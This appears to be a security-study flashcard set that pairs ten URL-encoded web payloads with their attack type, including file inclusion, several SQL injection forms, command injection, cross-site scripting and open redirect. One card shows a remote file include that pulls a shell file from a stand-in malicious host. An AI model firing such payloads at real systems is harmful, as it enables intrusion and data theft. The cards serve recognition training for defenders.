injection types and examples Flashcards
1
Q
Logfile=%2fetc%2fpassword%0C
A
Local File Inclusion (LFI)
2
Q
Item=widget%20union%20select%20null,null,@@version;-
A
SQL Injection (Union Based)
3
Q
Lookup=%(whoami)
A
Command Injections
4
Q
Search=Bob”%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e
A
Reflected Cross Site Scripting
5
Q
Logfile=http%2f%2fwww.malicious-site.com%2fshell.txt
A
Remote File Inclusion (RFI)
6
Q
Item=widget’+convert(int,@@version)+
A
SQL Injection (error-based)
7
Q
Site=www.exa’ping%20-c%202010%20localhost’mple.com
A
Command Injection
8
Q
inner-tab”>
alert(1)
A
DOM-based Cross Site Scripting
9
Q
Item=widget’;waitfor%20delay%20’00:00:20’;-
A
SQL Injection (Stacked)
10
Q
Redir=http:%2f%2fwww.malicious-site.com
A
URL Redirect
